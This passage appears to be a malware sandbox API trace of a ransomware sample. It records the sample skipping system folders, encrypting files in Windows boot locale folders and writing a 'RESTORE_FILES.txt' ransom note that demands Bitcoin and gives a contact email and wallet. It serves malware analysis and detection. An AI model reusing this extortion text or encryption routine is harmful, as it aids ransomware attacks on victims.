[0044.724] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0044.724] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0044.724] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0044.724] wnsprintfW (in: pszDest=0x46a5e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\ru-RU\\..") returned 20 [0044.724] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0044.724] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0044.724] FindNextFileW (in: hFindFile=0x447c80, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 1 [0044.724] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="Windows") returned -1 [0044.724] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="Program Files") returned -1 [0044.724] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="Program Files (x86)") returned -1 [0044.724] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="$Recycle.bin") returned 1 [0044.724] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="System Volume Information") returned -1 [0044.724] wnsprintfW (in: pszDest=0x46a5e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\ru-RU\\bootmgr.exe.mui") returned 33 [0044.724] StrStrIW (lpFirst="bootmgr.exe.mui", lpSrch=".protected") returned 0x0 [0044.724] lstrcmpW (lpString1="bootmgr.exe.mui", lpString2="RESTORE_FILES.txt") returned -1 [0044.724] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f39c | out: pbBuffer=0x295f39c) returned 1 [0044.724] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x447cc0*, pdwDataLen=0x295f3c4*=0x20, dwBufLen=0x30 | out: pbData=0x447cc0*, pdwDataLen=0x295f3c4*=0x30) returned 1 [0044.724] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\ru-RU\\bootmgr.exe.mui" (normalized: "c:\\boot\\ru-ru\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) 
returned 0xffffffff [0044.725] FindNextFileW (in: hFindFile=0x447c80, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 0 [0044.725] FindClose (in: hFindFile=0x447c80 | out: hFindFile=0x447c80) returned 1 [0044.725] wnsprintfW (in: pszDest=0x46a5e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\ru-RU\\RESTORE_FILES.txt") returned 35 [0044.725] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\ru-RU\\RESTORE_FILES.txt" (normalized: "c:\\boot\\ru-ru\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xac [0044.725] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. 
\r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0044.725] WriteFile (in: hFile=0xac, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295f3e4*=0x53d, lpOverlapped=0x0) returned 1 [0044.726] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0044.726] WriteFile (in: hFile=0xac, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295f3e4*=0x2ac, lpOverlapped=0x0) returned 1 [0044.726] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0044.726] WriteFile (in: hFile=0xac, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295f3e4*=0xb1, 
lpOverlapped=0x0) returned 1 [0044.726] CloseHandle (hObject=0xac) returned 1 [0044.726] FindNextFileW (in: hFindFile=0x447b60, lpFindFileData=0x295f670 | out: lpFindFileData=0x295f670) returned 1 [0044.726] lstrcmpiW (lpString1="sv-SE", lpString2="Windows") returned -1 [0044.726] lstrcmpiW (lpString1="sv-SE", lpString2="Program Files") returned 1 [0044.726] lstrcmpiW (lpString1="sv-SE", lpString2="Program Files (x86)") returned 1 [0044.726] lstrcmpiW (lpString1="sv-SE", lpString2="$Recycle.bin") returned 1 [0044.726] lstrcmpiW (lpString1="sv-SE", lpString2="System Volume Information") returned -1 [0044.726] wnsprintfW (in: pszDest=0x459508, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\sv-SE") returned 17 [0044.726] lstrcmpW (lpString1="sv-SE", lpString2=".") returned 1 [0044.726] lstrcmpW (lpString1="sv-SE", lpString2="..") returned 1 [0044.726] wnsprintfW (in: pszDest=0x46a5e8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Boot\\sv-SE\\*") returned 19 [0044.726] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\sv-SE\\*", lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 0x447c80 [0044.726] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0044.726] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0044.726] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0044.726] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0044.726] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0044.726] wnsprintfW (in: pszDest=0x46a5e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\sv-SE\\.") returned 19 [0044.726] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0044.726] FindNextFileW (in: hFindFile=0x447c80, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 1 [0044.726] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0044.726] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 
[0044.727] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0044.727] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0044.727] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0044.727] wnsprintfW (in: pszDest=0x46a5e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\sv-SE\\..") returned 20 [0044.727] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0044.727] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0044.727] FindNextFileW (in: hFindFile=0x447c80, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 1 [0044.727] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="Windows") returned -1 [0044.727] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="Program Files") returned -1 [0044.727] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="Program Files (x86)") returned -1 [0044.727] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="$Recycle.bin") returned 1 [0044.727] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="System Volume Information") returned -1 [0044.727] wnsprintfW (in: pszDest=0x46a5e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\sv-SE\\bootmgr.exe.mui") returned 33 [0044.727] StrStrIW (lpFirst="bootmgr.exe.mui", lpSrch=".protected") returned 0x0 [0044.727] lstrcmpW (lpString1="bootmgr.exe.mui", lpString2="RESTORE_FILES.txt") returned -1 [0044.727] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f39c | out: pbBuffer=0x295f39c) returned 1 [0044.727] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x447cc0*, pdwDataLen=0x295f3c4*=0x20, dwBufLen=0x30 | out: pbData=0x447cc0*, pdwDataLen=0x295f3c4*=0x30) returned 1 [0044.727] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\sv-SE\\bootmgr.exe.mui" (normalized: "c:\\boot\\sv-se\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) 
returned 0xffffffff [0044.728] FindNextFileW (in: hFindFile=0x447c80, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 0 [0044.728] FindClose (in: hFindFile=0x447c80 | out: hFindFile=0x447c80) returned 1 [0044.728] wnsprintfW (in: pszDest=0x46a5e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\sv-SE\\RESTORE_FILES.txt") returned 35 [0044.728] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\sv-SE\\RESTORE_FILES.txt" (normalized: "c:\\boot\\sv-se\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xac [0044.730] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. 
\r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0044.730] WriteFile (in: hFile=0xac, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295f3e4*=0x53d, lpOverlapped=0x0) returned 1 [0044.730] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0044.730] WriteFile (in: hFile=0xac, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295f3e4*=0x2ac, lpOverlapped=0x0) returned 1 [0044.730] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0044.730] WriteFile (in: hFile=0xac, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295f3e4*=0xb1, 
lpOverlapped=0x0) returned 1 [0044.730] CloseHandle (hObject=0xac) returned 1 [0044.731] FindNextFileW (in: hFindFile=0x447b60, lpFindFileData=0x295f670 | out: lpFindFileData=0x295f670) returned 1 [0044.731] lstrcmpiW (lpString1="tr-TR", lpString2="Windows") returned -1 [0044.731] lstrcmpiW (lpString1="tr-TR", lpString2="Program Files") returned 1 [0044.731] lstrcmpiW (lpString1="tr-TR", lpString2="Program Files (x86)") returned 1 [0044.731] lstrcmpiW (lpString1="tr-TR", lpString2="$Recycle.bin") returned 1 [0044.731] lstrcmpiW (lpString1="tr-TR", lpString2="System Volume Information") returned 1 [0044.731] wnsprintfW (in: pszDest=0x459508, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\tr-TR") returned 17 [0044.731] lstrcmpW (lpString1="tr-TR", lpString2=".") returned 1 [0044.731] lstrcmpW (lpString1="tr-TR", lpString2="..") returned 1 [0044.731] wnsprintfW (in: pszDest=0x46a5e8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Boot\\tr-TR\\*") returned 19 [0044.731] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\tr-TR\\*", lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 0x447c80 [0044.731] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0044.731] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0044.731] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0044.731] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0044.731] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0044.731] wnsprintfW (in: pszDest=0x46a5e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\tr-TR\\.") returned 19 [0044.731] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0044.731] FindNextFileW (in: hFindFile=0x447c80, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 1 [0044.731] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0044.731] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 
[0044.731] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0044.731] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0044.731] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0044.731] wnsprintfW (in: pszDest=0x46a5e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\tr-TR\\..") returned 20 [0044.731] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0044.731] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0044.731] FindNextFileW (in: hFindFile=0x447c80, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 1 [0044.732] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="Windows") returned -1 [0044.732] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="Program Files") returned -1 [0044.732] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="Program Files (x86)") returned -1 [0044.732] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="$Recycle.bin") returned 1 [0044.732] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="System Volume Information") returned -1 [0044.732] wnsprintfW (in: pszDest=0x46a5e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\tr-TR\\bootmgr.exe.mui") returned 33 [0044.732] StrStrIW (lpFirst="bootmgr.exe.mui", lpSrch=".protected") returned 0x0 [0044.732] lstrcmpW (lpString1="bootmgr.exe.mui", lpString2="RESTORE_FILES.txt") returned -1 [0044.732] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f39c | out: pbBuffer=0x295f39c) returned 1 [0044.732] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x447cc0*, pdwDataLen=0x295f3c4*=0x20, dwBufLen=0x30 | out: pbData=0x447cc0*, pdwDataLen=0x295f3c4*=0x30) returned 1 [0044.732] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\tr-TR\\bootmgr.exe.mui" (normalized: "c:\\boot\\tr-tr\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) 
returned 0xffffffff [0044.732] FindNextFileW (in: hFindFile=0x447c80, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 0 [0044.732] FindClose (in: hFindFile=0x447c80 | out: hFindFile=0x447c80) returned 1 [0044.732] wnsprintfW (in: pszDest=0x46a5e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\tr-TR\\RESTORE_FILES.txt") returned 35 [0044.732] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\tr-TR\\RESTORE_FILES.txt" (normalized: "c:\\boot\\tr-tr\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xac [0044.732] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. 
\r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0044.732] WriteFile (in: hFile=0xac, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295f3e4*=0x53d, lpOverlapped=0x0) returned 1 [0044.733] lstrlenA (lpString="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") returned 684 [0044.733] WriteFile (in: hFile=0xac, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295f3e4*=0x2ac, lpOverlapped=0x0) returned 1 [0044.733] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0044.733] WriteFile (in: hFile=0xac, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295f3e4*=0xb1, 
lpOverlapped=0x0) returned 1 [0044.733] CloseHandle (hObject=0xac) returned 1 [0044.733] FindNextFileW (in: hFindFile=0x447b60, lpFindFileData=0x295f670 | out: lpFindFileData=0x295f670) returned 1 [0044.733] lstrcmpiW (lpString1="zh-CN", lpString2="Windows") returned 1 [0044.733] lstrcmpiW (lpString1="zh-CN", lpString2="Program Files") returned 1 [0044.733] lstrcmpiW (lpString1="zh-CN", lpString2="Program Files (x86)") returned 1 [0044.733] lstrcmpiW (lpString1="zh-CN", lpString2="$Recycle.bin") returned 1 [0044.733] lstrcmpiW (lpString1="zh-CN", lpString2="System Volume Information") returned 1 [0044.733] wnsprintfW (in: pszDest=0x459508, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\zh-CN") returned 17 [0044.733] lstrcmpW (lpString1="zh-CN", lpString2=".") returned 1 [0044.733] lstrcmpW (lpString1="zh-CN", lpString2="..") returned 1 [0044.734] wnsprintfW (in: pszDest=0x46a5e8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Boot\\zh-CN\\*") returned 19 [0044.734] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\zh-CN\\*", lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 0x447c80 [0044.734] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0044.734] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0044.734] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0044.734] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0044.734] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0044.734] wnsprintfW (in: pszDest=0x46a5e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\zh-CN\\.") returned 19 [0044.734] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0044.734] FindNextFileW (in: hFindFile=0x447c80, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 1 [0044.734] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0044.734] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 
[0044.734] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0044.734] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0044.734] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0044.734] wnsprintfW (in: pszDest=0x46a5e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\zh-CN\\..") returned 20 [0044.734] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0044.734] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0044.734] FindNextFileW (in: hFindFile=0x447c80, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 1 [0044.734] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="Windows") returned -1 [0044.734] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="Program Files") returned -1 [0044.734] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="Program Files (x86)") returned -1 [0044.734] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="$Recycle.bin") returned 1 [0044.734] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="System Volume Information") returned -1 [0044.734] wnsprintfW (in: pszDest=0x46a5e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\zh-CN\\bootmgr.exe.mui") returned 33 [0044.734] StrStrIW (lpFirst="bootmgr.exe.mui", lpSrch=".protected") returned 0x0 [0044.734] lstrcmpW (lpString1="bootmgr.exe.mui", lpString2="RESTORE_FILES.txt") returned -1 [0044.734] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f39c | out: pbBuffer=0x295f39c) returned 1 [0044.734] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x447cc0*, pdwDataLen=0x295f3c4*=0x20, dwBufLen=0x30 | out: pbData=0x447cc0*, pdwDataLen=0x295f3c4*=0x30) returned 1 [0044.734] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\zh-CN\\bootmgr.exe.mui" (normalized: "c:\\boot\\zh-cn\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) 
returned 0xffffffff [0044.735] FindNextFileW (in: hFindFile=0x447c80, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 0 [0044.735] FindClose (in: hFindFile=0x447c80 | out: hFindFile=0x447c80) returned 1 [0044.735] wnsprintfW (in: pszDest=0x46a5e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\zh-CN\\RESTORE_FILES.txt") returned 35 [0044.735] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\zh-CN\\RESTORE_FILES.txt" (normalized: "c:\\boot\\zh-cn\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xac [0044.735] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. 
\r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: 